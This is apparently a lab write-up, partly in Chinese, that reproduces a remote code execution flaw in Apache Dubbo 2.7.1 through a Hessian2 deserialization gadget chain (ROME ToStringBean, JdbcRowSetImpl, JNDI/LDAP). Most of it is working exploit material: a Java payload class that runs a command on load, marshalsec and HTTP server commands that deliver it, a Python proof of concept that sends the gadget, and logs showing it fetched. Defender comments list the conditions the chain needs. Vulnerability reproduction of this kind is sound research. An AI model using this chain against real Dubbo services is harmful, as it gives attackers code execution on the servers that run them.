git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1
# 将整个项目dubbo-spring-boot-project导入IDEA
在dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml
引入以下依赖:
<dependency>
<groupId>com.rometools</groupId>
<artifactId>rome</artifactId>
<version>1.7.0</version>
</dependency>
修改默认端口:dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties
为12347
ExploitMac.java
// Payload class that terminal 1 serves over HTTP and that the LDAP reference
// from terminal 2 points to. Its no-arg constructor runs as soon as the class
// is instantiated, which is why remote-codebase loading through JNDI references
// is dangerous: the provider never calls a method on it, loading is enough.
// The command path is macOS-specific and only demonstrates that code ran.
// Defender note: the trace below runs on JDK 1.8.0_131; later JDK 8 updates
// default com.sun.jndi.ldap.object.trustURLCodebase to false, which refuses to
// fetch classes from a remote codebase via LDAP references -- confirm on the
// actual provider JDK rather than assuming.
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
terminal 1
[~/Downloads]$ cat ExploitMac.java [23:55:12]
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
[~/Downloads]$ vi ExploitMac.java [23:43:04]
[~/Downloads]$ javac ExploitMac.java [23:43:17]
[~/Downloads]$ python3 -m http.server 8088 [23:43:19]
zsh: correct 'http.server' to 'httpserver' [nyae]? n
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...
127.0.0.1 - - [23/Jun/2020 23:49:27] "GET /ExploitMac.class HTTP/1.1" 200 -
terminal 2
[master][~/GitProjects/marshalsec]$ java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/#ExploitMac 8087
Listening on 0.0.0.0:8087
Send LDAP reference result for ExploitMac redirecting to http://127.0.0.1:8088/ExploitMac.class
terminal 3
$ python3 -m pip install dubbo-py
$ python3 dubbo3.py
PoC
from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient
# Connects to the provider whose port was changed to 12347 in
# application.properties (see the setup steps above).
client = DubboClient('127.0.0.1', 12347)
# Hessian2 object whose getter chain performs a JNDI lookup: the provider's
# stack trace shows JdbcRowSetImpl.getDatabaseMetaData -> connect, which
# fails here with "JNDI 无法连接" (SQLException) once the lookup is attempted.
# dataSource is the JNDI name resolved during that connect.
JdbcRowSetImpl=new_object(
'com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://127.0.0.1:8087/ExploitMac",
strMatchColumns=["foo"]
)
# A java.lang.Class instance describing the bean class, required by
# ToStringBean's constructor signature (beanClass, obj).
JdbcRowSetImplClass=new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
# ToStringBean (rome-1.7.0, added to the provider's pom above) reflectively
# invokes the bean's getters inside toString(); per the trace, Dubbo reaches
# ToStringBean.toString via RpcInvocation.toString -> Arrays.toString while
# building a string in DubboProtocol.getInvoker (DubboProtocol.java:248) --
# i.e. during request handling, apparently before the invoker is resolved.
# Defender note: this chain needs (a) an attacker-controlled Hessian2 payload
# accepted by the provider, (b) ROME on the provider classpath and (c) a JDK
# that follows remote JNDI codebases; removing any one of them breaks it.
# The dev-list thread referenced at the bottom of the page presumably covers
# the upstream Dubbo fix -- verify the version actually deployed.
toStringBean=new_object(
'com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl
)
# Sends the invocation; the reply object is not inspected in this PoC, the
# provider-side log excerpt below is what demonstrates the effect.
resp = client.send_request_and_return_response(
service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
method_name='rce',
args=[toStringBean])
IDEA报错
2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean : Error while generating toString
java.lang.reflect.InvocationTargetException: null
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_131]
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_131]
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_131]
at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_131]
at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:129) [rome-1.7.0.jar:1.7.0]
at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
at java.util.Arrays.toString(Arrays.java:4571) [na:1.8.0_131]
at org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
at java.lang.StringBuilder.append(StringBuilder.java:131) [na:1.8.0_131]
at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:103) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:200) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:51) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:57) [dubbo-2.7.1.jar:2.7.1]
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) [na:1.8.0_131]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) [na:1.8.0_131]
at java.lang.Thread.run(Thread.java:748) [na:1.8.0_131]
Caused by: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004) ~[na:1.8.0_131]
... 20 common frames omitted
Wireshark:8087
Wireshark:12347
Demo
参考
- https://mp.weixin.qq.com/s/iKQbdWrMG00Arg0aEUbrXQ
- https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html